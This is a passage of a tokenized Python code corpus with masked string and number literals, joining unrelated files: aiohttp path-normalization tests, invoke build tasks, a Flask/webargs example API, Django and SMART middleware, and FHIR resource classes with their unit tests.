. post ( '<STR_LIT>' , { '<STR_LIT:foo>' : <NUM_LIT> } , expect_errors = True ) <EOL> assert res . status_code == <NUM_LIT> <EOL> def test_404_raised_by_handler ( self , app , client ) : <EOL> configure_app ( app , { '<STR_LIT>' : True } ) <EOL> res = client . get ( '<STR_LIT>' ) <EOL> assert res . status_code == <NUM_LIT> <EOL> res = res . follow ( expect_errors = True ) <EOL> assert res . status_code == <NUM_LIT> <EOL> def test_configuration_through_app_key ( self , app , client ) : <EOL> add_routes ( app ) <EOL> app [ CONFIG_KEY ] = { <EOL> '<STR_LIT>' : False <EOL> } <EOL> path_norm . setup ( app ) <EOL> res = client . get ( '<STR_LIT>' , expect_errors = True ) <EOL> assert res . status_code == <NUM_LIT> </s>
<s> import os <EOL> import webbrowser <EOL> from invoke import task , run <EOL> docs_dir = '<STR_LIT>' <EOL> build_dir = os . path . join ( docs_dir , '<STR_LIT>' ) <EOL> @ task <EOL> def test ( ) : <EOL> run ( '<STR_LIT>' , pty = True ) <EOL> @ task <EOL> def clean ( ) : <EOL> run ( "<STR_LIT>" ) <EOL> run ( "<STR_LIT>" ) <EOL> run ( "<STR_LIT>" ) <EOL> clean_docs ( ) <EOL> print ( "<STR_LIT>" ) <EOL> @ task <EOL> def clean_docs ( ) : <EOL> run ( "<STR_LIT>" % build_dir ) <EOL> @ task <EOL> def browse_docs ( ) : <EOL> path = os . path . join ( build_dir , '<STR_LIT>' ) <EOL> webbrowser . open_new_tab ( path ) <EOL> @ task <EOL> def docs ( clean = False , browse = False ) : <EOL> if clean : <EOL> clean_docs ( ) <EOL> run ( "<STR_LIT>" % ( docs_dir , build_dir ) , pty = True ) <EOL> if browse : <EOL> browse_docs ( ) <EOL> @ task <EOL> def readme ( browse = False ) : <EOL> run ( "<STR_LIT>" ) <EOL> if browse : <EOL> webbrowser . open_new_tab ( '<STR_LIT>' ) <EOL> @ task <EOL> def publish ( test = False ) : <EOL> """<STR_LIT>""" <EOL> clean ( ) <EOL> if test : <EOL> run ( '<STR_LIT>' , echo = True ) <EOL> run ( '<STR_LIT>' , echo = True ) <EOL> else : <EOL> run ( '<STR_LIT>' , echo = True ) <EOL> run ( '<STR_LIT>' , echo = True ) </s>
<s> """<STR_LIT>""" <EOL> import datetime as dt <EOL> from flask import Flask <EOL> from flask . ext import restful <EOL> from webargs import fields , validate <EOL> from webargs . flaskparser import use_args , use_kwargs , parser <EOL> app = Flask ( __name__ ) <EOL> api = restful . Api ( app ) <EOL> class IndexResource ( restful . Resource ) : <EOL> """<STR_LIT>""" <EOL> hello_args = { <EOL> '<STR_LIT:name>' : fields . Str ( missing = '<STR_LIT>' ) <EOL> } <EOL> @ use_args ( hello_args ) <EOL> def get ( self , args ) : <EOL> return { '<STR_LIT:message>' : '<STR_LIT>' . format ( args [ '<STR_LIT:name>' ] ) } <EOL> class AddResource ( restful . Resource ) : <EOL> """<STR_LIT>""" <EOL> add_args = { <EOL> '<STR_LIT:x>' : fields . Float ( required = True ) , <EOL> '<STR_LIT:y>' : fields . Float ( required = True ) , <EOL> } <EOL> @ use_kwargs ( add_args ) <EOL> def post ( self , x , y ) : <EOL> """<STR_LIT>""" <EOL> return { '<STR_LIT:result>' : x + y } <EOL> class DateAddResource ( restful . Resource ) : <EOL> dateadd_args = { <EOL> '<STR_LIT:value>' : fields . DateTime ( required = False ) , <EOL> '<STR_LIT>' : fields . Int ( required = True , validate = validate . Range ( min = <NUM_LIT:1> ) ) , <EOL> '<STR_LIT>' : fields . Str ( missing = '<STR_LIT>' , validate = validate . OneOf ( [ '<STR_LIT>' , '<STR_LIT>' ] ) ) <EOL> } <EOL> @ use_kwargs ( dateadd_args ) <EOL> def post ( self , value , addend , unit ) : <EOL> """<STR_LIT>""" <EOL> value = value or dt . datetime . utcnow ( ) <EOL> if unit == '<STR_LIT>' : <EOL> delta = dt . timedelta ( minutes = addend ) <EOL> else : <EOL> delta = dt . timedelta ( days = addend ) <EOL> result = value + delta <EOL> return { '<STR_LIT:result>' : result . isoformat ( ) } <EOL> @ parser . error_handler <EOL> def handle_request_parsing_error ( err ) : <EOL> """<STR_LIT>""" <EOL> restful . abort ( <NUM_LIT> , errors = err . messages ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> api . add_resource ( IndexResource , '<STR_LIT:/>' ) <EOL> api . add_resource ( AddResource , '<STR_LIT>' ) <EOL> api . add_resource ( DateAddResource , '<STR_LIT>' ) <EOL> app . run ( port = <NUM_LIT> , debug = True ) </s>
<s> from django . core . management import execute_manager <EOL> try : <EOL> import settings <EOL> except ImportError : <EOL> import sys <EOL> sys . stderr . write ( "<STR_LIT>" % __file__ ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> execute_manager ( settings ) </s>
<s> """<STR_LIT>""" <EOL> from smart . accesscontrol import security <EOL> from smart . lib . utils import DjangoVersionDependentExecutor <EOL> class LazyUser ( object ) : <EOL> def __get__ ( self , request , obj_type = None ) : <EOL> if not hasattr ( request , '<STR_LIT>' ) : <EOL> request . _cached_user = auth . get_user ( request ) <EOL> return request . _cached_user <EOL> class Authentication ( object ) : <EOL> def process_request ( self , request ) : <EOL> self . avoid_post_clobbering ( request ) <EOL> request . principal , request . oauth_request = security . get_principal ( request ) <EOL> noclobber_map = { <EOL> '<STR_LIT>' : lambda request : request . POST , <EOL> '<STR_LIT>' : lambda request : request . raw_post_data , <EOL> } <EOL> avoid_post_clobbering = DjangoVersionDependentExecutor ( noclobber_map ) <EOL> def process_exception ( self , request , exception ) : <EOL> print "<STR_LIT>" <EOL> import sys , traceback <EOL> print >> sys . stderr , exception , dir ( exception ) <EOL> traceback . print_exc ( file = sys . stderr ) <EOL> sys . stderr . flush ( ) </s>
<s> """<STR_LIT>""" <EOL> from base import * <EOL> from pha import * <EOL> from account import * <EOL> from smarthacks import * <EOL> from direct_access import * <EOL> from data_store import * </s>
<s> from . import resource <EOL> class Binary ( resource . Resource ) : <EOL> """<STR_LIT>""" <EOL> resource_name = "<STR_LIT>" <EOL> def __init__ ( self , jsondict = None ) : <EOL> """<STR_LIT>""" <EOL> self . content = None <EOL> """<STR_LIT>""" <EOL> self . contentType = None <EOL> """<STR_LIT>""" <EOL> super ( Binary , self ) . __init__ ( jsondict ) <EOL> def elementProperties ( self ) : <EOL> js = super ( Binary , self ) . elementProperties ( ) <EOL> js . extend ( [ <EOL> ( "<STR_LIT:content>" , "<STR_LIT:content>" , str , False , None , True ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" , str , False , None , True ) , <EOL> ] ) <EOL> return js </s>
<s> from . import element <EOL> class ContactPoint ( element . Element ) : <EOL> """<STR_LIT>""" <EOL> resource_name = "<STR_LIT>" <EOL> def __init__ ( self , jsondict = None ) : <EOL> """<STR_LIT>""" <EOL> self . period = None <EOL> """<STR_LIT>""" <EOL> self . rank = None <EOL> """<STR_LIT>""" <EOL> self . system = None <EOL> """<STR_LIT>""" <EOL> self . use = None <EOL> """<STR_LIT>""" <EOL> self . value = None <EOL> """<STR_LIT>""" <EOL> super ( ContactPoint , self ) . __init__ ( jsondict ) <EOL> def elementProperties ( self ) : <EOL> js = super ( ContactPoint , self ) . elementProperties ( ) <EOL> js . extend ( [ <EOL> ( "<STR_LIT>" , "<STR_LIT>" , period . Period , False , None , False ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" , int , False , None , False ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" , str , False , None , False ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" , str , False , None , False ) , <EOL> ( "<STR_LIT:value>" , "<STR_LIT:value>" , str , False , None , False ) , <EOL> ] ) <EOL> return js <EOL> from . import period </s>
<s> import os <EOL> import io <EOL> import unittest <EOL> import json <EOL> from . import documentmanifest <EOL> from . fhirdate import FHIRDate <EOL> class DocumentManifestTests ( unittest . TestCase ) : <EOL> def instantiate_from ( self , filename ) : <EOL> datadir = os . environ . get ( '<STR_LIT>' ) or '<STR_LIT>' <EOL> with io . open ( os . path . join ( datadir , filename ) , '<STR_LIT:r>' , encoding = '<STR_LIT:utf-8>' ) as handle : <EOL> js = json . load ( handle ) <EOL> self . assertEqual ( "<STR_LIT>" , js [ "<STR_LIT>" ] ) <EOL> return documentmanifest . DocumentManifest ( js ) <EOL> def testDocumentManifest1 ( self ) : <EOL> inst = self . instantiate_from ( "<STR_LIT>" ) <EOL> self . assertIsNotNone ( inst , "<STR_LIT>" ) <EOL> self . implDocumentManifest1 ( inst ) <EOL> js = inst . as_json ( ) <EOL> self . assertEqual ( "<STR_LIT>" , js [ "<STR_LIT>" ] ) <EOL> inst2 = documentmanifest . DocumentManifest ( js ) <EOL> self . implDocumentManifest1 ( inst2 ) <EOL> def implDocumentManifest1 ( self , inst ) : <EOL> self . assertEqual ( inst . contained [ <NUM_LIT:0> ] . id , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . created . date , FHIRDate ( "<STR_LIT>" ) . date ) <EOL> self . assertEqual ( inst . created . as_json ( ) , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . description , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . id , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . identifier [ <NUM_LIT:0> ] . system , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . identifier [ <NUM_LIT:0> ] . value , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . masterIdentifier . system , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . masterIdentifier . value , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . related [ <NUM_LIT:0> ] . identifier . system , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . related [ <NUM_LIT:0> ] . identifier . value , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . source , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . status , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . text . div , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . text . status , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . type . text , "<STR_LIT>" ) </s>
<s> import logging <EOL> from . import reference <EOL> class FHIRReference ( reference . Reference ) : <EOL> """<STR_LIT>""" <EOL> def resolved ( self , klass ) : <EOL> """<STR_LIT>""" <EOL> owning_resource = self . owningResource ( ) <EOL> if owning_resource is None : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> if klass is None : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> refid = self . processedReferenceIdentifier ( ) <EOL> if not refid : <EOL> logging . warning ( "<STR_LIT>" ) <EOL> return None <EOL> resolved = owning_resource . resolvedReference ( refid ) <EOL> if resolved is not None : <EOL> if isinstance ( resolved , klass ) : <EOL> return resolved <EOL> logging . warning ( "<STR_LIT>" . format ( refid , klass , resolved . __class__ ) ) <EOL> return None <EOL> if owning_resource . contained is not None : <EOL> for contained in owning_resource . contained : <EOL> if contained . id == refid : <EOL> owning_resource . didResolveReference ( refid , contained ) <EOL> if isinstance ( contained , klass ) : <EOL> return contained <EOL> logging . warning ( "<STR_LIT>" . format ( refid , klass , contained . __class__ ) ) <EOL> return None <EOL> ref_is_relative = '<STR_LIT>' not in self . reference and '<STR_LIT>' != self . reference [ : <NUM_LIT:4> ] <EOL> if ( sys . version_info < ( <NUM_LIT:3> , <NUM_LIT:0> ) ) : <EOL> from . import bundle <EOL> bundle = self . owningBundle ( ) <EOL> while bundle is not None : <EOL> if bundle . entry is not None : <EOL> fullUrl = self . reference <EOL> if ref_is_relative : <EOL> base = bundle . server . base_uri if bundle . server else '<STR_LIT>' <EOL> fullUrl = base + self . reference <EOL> for entry in bundle . entry : <EOL> if entry . fullUrl == fullUrl : <EOL> found = entry . resource <EOL> if isinstance ( found , klass ) : <EOL> return found <EOL> logging . warning ( "<STR_LIT>" . format ( refid , klass , found . __class__ ) ) <EOL> return None <EOL> bundle = bundle . owningBundle ( ) <EOL> server = None <EOL> if ref_is_relative : <EOL> server = owning_resource . server if owning_resource else None <EOL> if server is None : <EOL> logging . warning ( "<STR_LIT>" <EOL> . format ( self . reference ) ) <EOL> return None <EOL> relative = klass . read_from ( self . reference , server ) <EOL> owning_resource . didResolveReference ( refid , relative ) <EOL> return relative <EOL> def processedReferenceIdentifier ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . reference and '<STR_LIT:#>' == self . reference [ <NUM_LIT:0> ] : <EOL> return self . reference [ <NUM_LIT:1> : ] <EOL> return self . reference <EOL> import sys <EOL> if ( sys . version_info > ( <NUM_LIT:3> , <NUM_LIT:0> ) ) : <EOL> from . import bundle </s>
<s> import os <EOL> import io <EOL> import unittest <EOL> import json <EOL> from . import medication <EOL> from . fhirdate import FHIRDate <EOL> class MedicationTests ( unittest . TestCase ) : <EOL> def instantiate_from ( self , filename ) : <EOL> datadir = os . environ . get ( '<STR_LIT>' ) or '<STR_LIT>' <EOL> with io . open ( os . path . join ( datadir , filename ) , '<STR_LIT:r>' , encoding = '<STR_LIT:utf-8>' ) as handle : <EOL> js = json . load ( handle ) <EOL> self . assertEqual ( "<STR_LIT>" , js [ "<STR_LIT>" ] ) <EOL> return medication . Medication ( js ) <EOL> def testMedication1 ( self ) : <EOL> inst = self . instantiate_from ( "<STR_LIT>" ) <EOL> self . assertIsNotNone ( inst , "<STR_LIT>" ) <EOL> self . implMedication1 ( inst ) <EOL> js = inst . as_json ( ) <EOL> self . assertEqual ( "<STR_LIT>" , js [ "<STR_LIT>" ] ) <EOL> inst2 = medication . Medication ( js ) <EOL> self . implMedication1 ( inst2 ) <EOL> def implMedication1 ( self , inst ) : <EOL> self . assertEqual ( inst . code . coding [ <NUM_LIT:0> ] . code , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . code . coding [ <NUM_LIT:0> ] . display , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . code . coding [ <NUM_LIT:0> ] . system , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . id , "<STR_LIT>" ) <EOL> self . assertTrue ( inst . isBrand ) <EOL> self . assertEqual ( inst . product . form . coding [ <NUM_LIT:0> ] . code , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . product . form . coding [ <NUM_LIT:0> ] . display , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . product . form . coding [ <NUM_LIT:0> ] . system , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . product . ingredient [ <NUM_LIT:0> ] . amount . denominator . value , <NUM_LIT:1> ) <EOL> self . assertEqual ( inst . product . ingredient [ <NUM_LIT:0> ] . amount . numerator . code , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . product . ingredient [ <NUM_LIT:0> ] . amount . numerator . system , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . product . ingredient [ <NUM_LIT:0> ] . amount . numerator . unit , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . product . ingredient [ <NUM_LIT:0> ] . amount . numerator . value , <NUM_LIT:100> ) <EOL> self . assertEqual ( inst . text . status , "<STR_LIT>" ) <EOL> def testMedication2 ( self ) : <EOL> inst = self . instantiate_from ( "<STR_LIT>" ) <EOL> self . assertIsNotNone ( inst , "<STR_LIT>" ) <EOL> self . implMedication2 ( inst ) <EOL> js = inst . as_json ( ) <EOL> self . assertEqual ( "<STR_LIT>" , js [ "<STR_LIT>" ] ) <EOL> inst2 = medication . Medication ( js ) <EOL> self . implMedication2 ( inst2 ) <EOL> def implMedication2 ( self , inst ) : <EOL> self . assertEqual ( inst . code . coding [ <NUM_LIT:0> ] . code , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . code . coding [ <NUM_LIT:0> ] . display , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . code . coding [ <NUM_LIT:0> ] . system , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . id , "<STR_LIT>" ) <EOL> self . assertTrue ( inst . isBrand ) <EOL> self . assertEqual ( inst . package . container . coding [ <NUM_LIT:0> ] . code , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . package . container . coding [ <NUM_LIT:0> ] . display , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . package . container . coding [ <NUM_LIT:0> ] . system , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . text . status , "<STR_LIT>" ) <EOL> def testMedication3 ( self ) : <EOL> inst = self . instantiate_from ( "<STR_LIT>" ) <EOL> self . assertIsNotNone ( inst , "<STR_LIT>" ) <EOL> self . implMedication3 ( inst ) <EOL> js = inst . as_json ( ) <EOL> self . assertEqual ( "<STR_LIT>" , js [ "<STR_LIT>" ] ) <EOL> inst2 = medication . Medication ( js ) <EOL> self . implMedication3 ( inst2 ) <EOL> def implMedication3 ( self , inst ) : <EOL> self . assertEqual ( inst . code . coding [ <NUM_LIT:0> ] . code , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . code . coding [ <NUM_LIT:0> ] . display , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . code . coding [ <NUM_LIT:0> ] . system , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . id , "<STR_LIT>" ) <EOL> self . assertTrue ( inst . isBrand ) <EOL> self . assertEqual ( inst . package . container . coding [ <NUM_LIT:0> ] . code , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . package . container . coding [ <NUM_LIT:0> ] . display , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . package . container . coding [ <NUM_LIT:0> ] . system , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . text . status , "<STR_LIT>" ) <EOL> def testMedication4 ( self ) : <EOL> inst = self . instantiate_from ( "<STR_LIT>" ) <EOL> self . assertIsNotNone ( inst , "<STR_LIT>" ) <EOL> self . implMedication4 ( inst ) <EOL> js = inst . as_json ( ) <EOL> self . assertEqual ( "<STR_LIT>" , js [ "<STR_LIT>" ] ) <EOL> inst2 = medication . Medication ( js ) <EOL> self . implMedication4 ( inst2 ) <EOL> def implMedication4 ( self , inst ) : <EOL> self . assertEqual ( inst . code . coding [ <NUM_LIT:0> ] . code , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . code . coding [ <NUM_LIT:0> ] . display , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . code . coding [ <NUM_LIT:0> ] . system , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . id , "<STR_LIT>" ) <EOL> self . assertTrue ( inst . isBrand ) <EOL> self . assertEqual ( inst . package . container . coding [ <NUM_LIT:0> ] . code , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . package . container . coding [ <NUM_LIT:0> ] . display , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . package . container . coding [ <NUM_LIT:0> ] . system , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . text . status , "<STR_LIT>" ) <EOL> def testMedication5 ( self ) : <EOL> inst = self . instantiate_from ( "<STR_LIT>" ) <EOL> self . assertIsNotNone ( inst , "<STR_LIT>" ) <EOL> self . implMedication5 ( inst ) <EOL> js = inst . as_json ( ) <EOL> self . assertEqual ( "<STR_LIT>" , js [ "<STR_LIT>" ] ) <EOL> inst2 = medication . Medication ( js ) <EOL> self . implMedication5 ( inst2 ) <EOL> def implMedication5 ( self , inst ) : <EOL> self . assertEqual ( inst . code . coding [ <NUM_LIT:0> ] . code , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . code . coding [ <NUM_LIT:0> ] . display , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . code . coding [ <NUM_LIT:0> ] . system , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . id , "<STR_LIT>" ) <EOL> self . assertTrue ( inst . isBrand ) <EOL> self . assertEqual ( inst . package . container . coding [ <NUM_LIT:0> ] . code , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . package . container . coding [ <NUM_LIT:0> ] . display , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . package . container . coding [ <NUM_LIT:0> ] . system , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . text . status , "<STR_LIT>" ) <EOL> def testMedication6 ( self ) : <EOL> inst = self . instantiate_from ( "<STR_LIT>" ) <EOL> self . assertIsNotNone ( inst , "<STR_LIT>" ) <EOL> self . implMedication6 ( inst ) <EOL> js = inst . as_json ( ) <EOL> self . assertEqual ( "<STR_LIT>" , js [ "<STR_LIT>" ] ) <EOL> inst2 = medication . Medication ( js ) <EOL> self . implMedication6 ( inst2 ) <EOL> def implMedication6 ( self , inst ) : <EOL> self . assertEqual ( inst . code . coding [ <NUM_LIT:0> ] . code , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . code . coding [ <NUM_LIT:0> ] . display , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . code . coding [ <NUM_LIT:0> ] . system , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . id , "<STR_LIT>" ) <EOL> self . assertFalse ( inst . isBrand ) <EOL> self . assertEqual ( inst . product . form . coding [ <NUM_LIT:0> ] . code , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . product . form . coding [ <NUM_LIT:0> ] . display , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . product . form . coding [ <NUM_LIT:0> ] . system , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . product . ingredient [ <NUM_LIT:0> ] . amount . denominator . code , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . product . ingredient [ <NUM_LIT:0> ] . amount . denominator . system , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . product . ingredient [ <NUM_LIT:0> ] . amount . denominator . value , <NUM_LIT:1> ) <EOL> self . assertEqual ( inst . product . ingredient [ <NUM_LIT:0> ] . amount . numerator . code , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . product . ingredient [ <NUM_LIT:0> ] . amount . numerator . system , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . product . ingredient [ <NUM_LIT:0> ] . amount . numerator . value , <NUM_LIT> ) <EOL> self . assertEqual ( inst . product . ingredient [ <NUM_LIT:1> ] . amount . denominator . code , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . product . ingredient [ <NUM_LIT:1> ] . amount . denominator . system , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . product . ingredient [ <NUM_LIT:1> ] . amount . denominator . value , <NUM_LIT:1> ) <EOL> self . assertEqual ( inst . product . ingredient [ <NUM_LIT:1> ] . amount . numerator . code , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . product . ingredient [ <NUM_LIT:1> ] . amount . numerator . system , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . product . ingredient [ <NUM_LIT:1> ] . amount . numerator . value , <NUM_LIT> ) <EOL> self . assertEqual ( inst . text . status , "<STR_LIT>" ) <EOL> def testMedication7 ( self ) : <EOL> inst = self . instantiate_from ( "<STR_LIT>" ) <EOL> self . assertIsNotNone ( inst , "<STR_LIT>" ) <EOL> self . implMedication7 ( inst ) <EOL> js = inst . as_json ( ) <EOL> self . assertEqual ( "<STR_LIT>" , js [ "<STR_LIT>" ] ) <EOL> inst2 = medication . Medication ( js ) <EOL> self . implMedication7 ( inst2 ) <EOL> def implMedication7 ( self , inst ) : <EOL> self . assertEqual ( inst . code . coding [ <NUM_LIT:0> ] . code , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . code . coding [ <NUM_LIT:0> ] . display , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . code . coding [ <NUM_LIT:0> ] . system , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . id , "<STR_LIT>" ) <EOL> self . assertFalse ( inst . isBrand ) <EOL> self . assertEqual ( inst . product . form . coding [ <NUM_LIT:0> ] . code , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . product . form . coding [ <NUM_LIT:0> ] . display , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . product . form . coding [ <NUM_LIT:0> ] . system , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . text . status , "<STR_LIT>" ) <EOL> def testMedication8 ( self ) : <EOL> inst = self . instantiate_from ( "<STR_LIT>" ) <EOL> self . assertIsNotNone ( inst , "<STR_LIT>" ) <EOL> self . implMedication8 ( inst ) <EOL> js = inst . as_json ( ) <EOL> self . assertEqual ( "<STR_LIT>" , js [ "<STR_LIT>" ] ) <EOL> inst2 = medication . Medication ( js ) <EOL> self . implMedication8 ( inst2 ) <EOL> def implMedication8 ( self , inst ) : <EOL> self . assertEqual ( inst . code . coding [ <NUM_LIT:0> ] . code , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . code . coding [ <NUM_LIT:0> ] . display , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . code . coding [ <NUM_LIT:0> ] . system , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . id , "<STR_LIT>" ) <EOL> self . assertFalse ( inst . isBrand ) <EOL> self . assertEqual ( inst . product . form . coding [ <NUM_LIT:0> ] . code , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . product . form . coding [ <NUM_LIT:0> ] . display , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . product . form . coding [ <NUM_LIT:0> ] . system , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . text . status , "<STR_LIT>" ) </s>
<s> import os <EOL> import io <EOL> import unittest <EOL> import json <EOL> from . import parameters <EOL> from . fhirdate import FHIRDate <EOL> class ParametersTests ( unittest . TestCase ) : <EOL> def instantiate_from ( self , filename ) : <EOL> datadir = os . environ . get ( '<STR_LIT>' ) or '<STR_LIT>' <EOL> with io . open ( os . path . join ( datadir , filename ) , '<STR_LIT:r>' , encoding = '<STR_LIT:utf-8>' ) as handle : <EOL> js = json . load ( handle ) <EOL> self . assertEqual ( "<STR_LIT>" , js [ "<STR_LIT>" ] ) <EOL> return parameters . Parameters ( js ) <EOL> def testParameters1 ( self ) : <EOL> inst = self . instantiate_from ( "<STR_LIT>" ) <EOL> self . assertIsNotNone ( inst , "<STR_LIT>" ) <EOL> self . implParameters1 ( inst ) <EOL> js = inst . as_json ( ) <EOL> self . assertEqual ( "<STR_LIT>" , js [ "<STR_LIT>" ] ) <EOL> inst2 = parameters . Parameters ( js ) <EOL> self . implParameters1 ( inst2 ) <EOL> def implParameters1 ( self , inst ) : <EOL> self . assertEqual ( inst . id , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . parameter [ <NUM_LIT:0> ] . name , "<STR_LIT:start>" ) <EOL> self . assertEqual ( inst . parameter [ <NUM_LIT:0> ] . valueDate . date , FHIRDate ( "<STR_LIT>" ) . date ) <EOL> self . assertEqual ( inst . parameter [ <NUM_LIT:0> ] . valueDate . as_json ( ) , "<STR_LIT>" ) <EOL> self . assertEqual ( inst . parameter [ <NUM_LIT:1> ] . name , "<STR_LIT:end>" ) </s>
<s> from . import element <EOL> class Range ( element . Element ) : <EOL> """<STR_LIT>""" <EOL> resource_name = "<STR_LIT>" <EOL> def __init__ ( self , jsondict = None ) : <EOL> """<STR_LIT>""" <EOL> self . high = None <EOL> """<STR_LIT>""" <EOL> self . low = None <EOL> """<STR_LIT>""" <EOL> super ( Range , self ) . __init__ ( jsondict ) <EOL> def elementProperties ( self ) : <EOL> js = super ( Range , self ) . elementProperties ( ) <EOL> js . extend ( [ <EOL> ( "<STR_LIT>" , "<STR_LIT>" , quantity . Quantity , False , None , False ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" , quantity . Quantity , False , None , False ) , <EOL> ] ) <EOL> return js <EOL> from . import quantity </s>
<s> from . import domainresource <EOL> class SupplyRequest ( domainresource . DomainResource ) : <EOL> """<STR_LIT>""" <EOL> resource_name = "<STR_LIT>" <EOL> def __init__ ( self , jsondict = None ) : <EOL> """<STR_LIT>""" <EOL> self . date = None <EOL> """<STR_LIT>""" <EOL> self . identifier = None <EOL> """<STR_LIT>""" <EOL> self . kind = None <EOL> """<STR_LIT>""" <EOL> self . orderedItem = None <EOL> """<STR_LIT>""" <EOL> self . patient = None <EOL> """<STR_LIT>""" <EOL> self . reasonCodeableConcept = None <EOL> """<STR_LIT>""" <EOL> self . reasonReference = None <EOL> """<STR_LIT>""" <EOL> self . source = None <EOL> """<STR_LIT>""" <EOL> self . status = None <EOL> """<STR_LIT>""" <EOL> self . supplier = None <EOL> """<STR_LIT>""" <EOL> self . when = None <EOL> """<STR_LIT>""" <EOL> super ( SupplyRequest , self ) . __init__ ( jsondict ) <EOL> def elementProperties ( self ) : <EOL> js = super ( SupplyRequest , self ) . elementProperties ( ) <EOL> js . extend ( [ <EOL> ( "<STR_LIT:date>" , "<STR_LIT:date>" , fhirdate . FHIRDate , False , None , False ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" , identifier . Identifier , False , None , False ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" , codeableconcept . CodeableConcept , False , None , False ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" , fhirreference . FHIRReference , False , None , False ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" , fhirreference . FHIRReference , False , None , False ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" , codeableconcept . CodeableConcept , False , "<STR_LIT>" , False ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" , fhirreference . FHIRReference , False , "<STR_LIT>" , False ) , <EOL> ( "<STR_LIT:source>" , "<STR_LIT:source>" , fhirreference . FHIRReference , False , None , False ) , <EOL> ( "<STR_LIT:status>" , "<STR_LIT:status>" , str , False , None , False ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" , fhirreference . FHIRReference , True , None , False ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" , SupplyRequestWhen , False , None , False ) , <EOL> ] ) <EOL> return js <EOL> from . import backboneelement <EOL> class SupplyRequestWhen ( backboneelement . BackboneElement ) : <EOL> """<STR_LIT>""" <EOL> resource_name = "<STR_LIT>" <EOL> def __init__ ( self , jsondict = None ) : <EOL> """<STR_LIT>""" <EOL> self . code = None <EOL> """<STR_LIT>""" <EOL> self . schedule = None 